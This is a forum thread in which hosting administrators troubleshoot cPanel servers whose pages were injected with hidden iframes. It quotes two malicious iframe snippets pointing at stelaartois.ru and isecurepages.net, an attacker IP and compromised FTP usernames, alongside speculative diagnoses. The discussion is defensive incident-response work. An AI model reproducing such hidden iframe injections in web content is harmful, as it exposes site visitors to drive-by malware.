stelaartois.ru - cpanel server hacked ?

[forlinuxsupport]

Hi

I have foudn thsi on one of my cpanel servers and googling it has come up with 2 other servers it has happened on. One of the common things is they are all CPANEL servers.

I have inserted spaces in the words , in case someone clicks on it

< I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
s t y l e='display:none'></IFRAME>

It seems to really slow the servr down.. some type of doss attack when running it ?

Anyone else had this issue. I'm busy investigating it, so I will post back here is I find anything.

Just found out, one server chnaged the root password and that stopped them getting on. I looked in logs and cant find anyone sshing on.. hmm... puzzling.

Regards
Andy

[Kelmas]

That is an explot that hit many HostGator servers some time ago and that iframe contained a serious virus. I suggest backing up /home/ dirs and reinstall servers.

The problem is in PHP rendering (automatically ads iframe to all generated pages) and spreads due to IE exploit. Other browsers does not show this.

[forlinuxsupport]

Hey guys

I know the exploit you are talking about and I ran the cpanel script and did the force update when that happened (about a month or so ago).

So I'm puzzled as to how they are able to do it now...

I'm hoping its not a new cpanel exploit. apache Logs have rotated (nice one cpanel) so I cant even look back in those.

Regards
Andy

[AndyReed]

Quote:

Originally Posted by forlinuxsupport

I have found this on one of my cpanel servers and googling it has come up with 2 other servers it has happened on. One of the common things is they are all CPANEL servers.

I have inserted spaces in the words , in case someone clicks on it

< I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
s t y l e='display:none'></IFRAME>

It seems to really slow the servr down.. some type of doss attack when running it ?

Anyone else had this issue. I'm busy investigating it, so I will post back here is I find anything.

Just found out, one server chnaged the root password and that stopped them getting on. I looked in logs and cant find anyone sshing on.. hmm... puzzling.

Just in case, these are few of the symptoms of a server that has been compromised:

1. Applications that suddenly don't respond as expected.
2. Additional user accounts that you can't account for (these may be made to look like system accounts)
3. New files or directories with unusual names.
4. Additional network traffic that can't be traced to a particular process
5. E-Mail from a security department implying that your server has been port scanning or sending malicious network traffic
6. Server running significantly slower

If you are experiencing any of these symptoms, your server has been compromised and the best solution is OS reload.

[AndyReed]

Quote:

Originally Posted by forlinuxsupport

I'm hoping its not a new cpanel exploit.

Is it cPanel exploit???

[JamesSmith]

Some of our servers are suffering the same fate, despite everything being up to date. Some web sites on some servers have the following added to their index.php pages:

Code:

<iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>

I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!

[AndyReed]

Quote:

Originally Posted by JamesSmith

I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!

Unless you can prove that your server was hacked because of their control panel, otherwise you don't have a case agianst them. It is in your best interest to take all measures to harden and secure your server. Remember that the cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, the cPanel is the most secure and robust control panel.

[Kelmas]

Quote:

Originally Posted by JamesSmith

I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!

You can try to search for information at HostGator Forums, guys had a hard time, but solved similar attack.

[JamesSmith]

Quote:

Originally Posted by AndyReed

Unless you can prove that your server was hacked because of their control panel, otherwise you don't have a case agianst them. It is in your best interest to take all measures to harden and secure your server. Remember that the cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, the cPanel is the most secure and robust control panel.

I have no doubt that it was because of the recent cPanel exploit as its occurred and is occurring on a number of other hosts.

It will be interesting to see how this progresses and if the impact of it is felt further, maybe when more people are affected will someone take notice.

[dfltech]

I was googling and found some links that had this problem as well..

Now what concerned me was they all used cPanel server and they all are effected in late November. So it is definately not the last exploit.

I hope that it is not the cPanel again..!!!

[Kelmas]

Quote:

Originally Posted by dfltech

Now what concerned me was they all used cPanel server and they all are effected in late November. So it is definately not the last exploit.

Actually late September.

[JamesSmith]

isecurepage code started to appear for us about a week before the cPanel exploit was announced by cPanel.

I think we need some clarification from hostgator if their problem was the same and the line of code that was added to peoples sites - If we can see a pattern, then there’s still a problem that cPanel needs to do something about.

The problem is, we dont know how this line of code is being added to sites.

[Kelmas]

Quote:

Originally Posted by JamesSmith

The problem is, we dont know how this line of code is being added to sites.

As in Hostgator's issue, these lines were added by infected PHP engine during page rendering.

[forlinuxsupport]

yes.. got it

They had guessed 3 users ftp usernames and passwords on the server.

Not sure how they would get those usernames.

The ip he came from was - 209.160.65.6

The usernames were.. so not easy to guess
lookwhat
paulslee
yeschef

I'm wondering if there is more too this.. and how they got thoese detials ...

Might have exploited the server earlier and downloaded all usernames and passwords..

Cheers
Andy

[dfltech]

Quote:

Originally Posted by Kelmas

Actually late September.

No its late November... and by the way I have a friend whos site had the same iframe hack yesterday.. now he has a VPS with very few sites and cPanel.. but all other sites were intact.. So this should not have any thing to do with cPanel I suppose.

May be a PHP application or a function...

And regarding hostgator.. their issues was at the same time when cPanel had an exploit.. I have gone through their forums but did not fine any recent complains about the iframe hack.